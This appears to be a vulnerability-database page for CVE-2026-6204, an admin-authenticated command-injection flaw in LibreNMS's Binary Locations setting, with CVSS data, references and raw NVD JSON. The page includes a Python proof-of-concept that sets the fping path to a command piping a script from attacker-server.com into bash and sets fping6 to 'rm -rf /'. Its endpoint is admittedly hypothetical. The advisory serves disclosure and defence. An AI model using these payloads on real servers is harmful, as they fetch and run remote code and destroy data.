CVE-2026-6204

Description

LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* - VULNERABLE

LibreNMS < 26.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-6204
# This script demonstrates how an authenticated admin might exploit the Binary Location configuration.

import requests

# Target configuration
target_url = "http://librenms-example.com"
username = "admin"
password = "your_admin_password"

# Initialize session
session = requests.Session()

# 1. Login to obtain session cookie
login_payload = {
    "username": username,
    "password": password
}
session.post(f"{target_url}/login", data=login_payload)

# 2. Update Binary Location configuration
# Exploit: Changing 'fping' path to a malicious command
# Depending on the specific UI/API endpoint, the parameter names may vary.
config_payload = {
    "fping": "/bin/bash -c 'curl http://attacker-server.com/shell.sh | bash'", 
    "fping6": "/bin/bash -c 'rm -rf /'" # Example of destructive command
}

# Sending the configuration update request
# Endpoint is hypothetical based on standard LibreNMS structure
response = session.post(f"{target_url}/settings/ binaries/update", data=config_payload)

if response.status_code == 200:
    print("[+] Configuration updated successfully.")

    # 3. Trigger Exploitation
    # Force LibreNMS to execute the Netcommand (e.g., by adding a dummy device)
    trigger_payload = {
        "hostname": "192.168.1.100",
        "type": "server",
        "snmp": "on"
    }
    session.post(f"{target_url}/addhost", data=trigger_payload)
    print("[+] Triggered Netcommand. Check your listener.")
else:
    print("[-] Failed to update configuration.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6204/
[4] VulDB https://vuldb.com/cve/CVE-2026-6204
[5] https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh
[6] https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6204", "sourceIdentifier": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "published": "2026-04-13T11:16:06.243", "lastModified": "2026-04-22T19:47:46.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server."}], "metrics": {"cvssMetricV40": [{"source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3.0", "matchCriteriaId": "A43AE03C-7129-4F1F-B01C-28637F82A1B4"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh", "source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "tags": ["Third Party Advisory"]}, {"url": "https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc", "source": "ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a", "tags": ["Exploit", "Third Party Advisory"]}]}}